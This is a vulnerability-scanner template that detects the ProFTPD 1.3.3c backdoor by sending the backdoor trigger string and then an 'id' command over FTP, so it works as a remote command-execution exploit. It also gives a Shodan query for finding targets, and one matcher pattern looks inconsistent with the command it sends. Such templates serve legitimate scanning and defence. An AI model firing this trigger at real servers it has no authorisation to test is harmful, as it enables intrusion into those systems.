id: proftpd-backdoor

info:
  name: ProFTPd-1.3.3c - Backdoor Command Execution
  author: pussycat0x
  severity: critical
  description: |
    This backdoor was present in the proftpd-1.3.3c.
  reference:
    - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
    - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
  metadata:
    max-request: 1
    shodan-query: "product:\"ProFTPD\""
  tags: js,network,proftpd,ftp,backdoor

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const data = ["HELP ACIDBITCHEZ\n", "id"];
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      let resp = conn.RecvFullString();
      if (resp.includes("ProFTPD 1.3.3c"))
      {
        for (let i = 0; i < data.length; i++)
          {
          conn.Send(data[i]);
          console.log('Sending:', data[i]);
          let resp = conn.RecvFullString();
          resp
      }
        } else
        {
      exit();
        }

    args:
      Host: "{{Host}}"
      Port: 21

    matchers:
      - type: dsl
        dsl:
          - "success == true"

      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100bb82a217b67498139c709562bd0f21f865658f6d4a27ef4e3d8a86886323865202202ffeb3c9273386c04f21a49024b4f3584dd5532fc3ad238e5c669b9d47025825:922c64590222798bb761d5b6d8e72950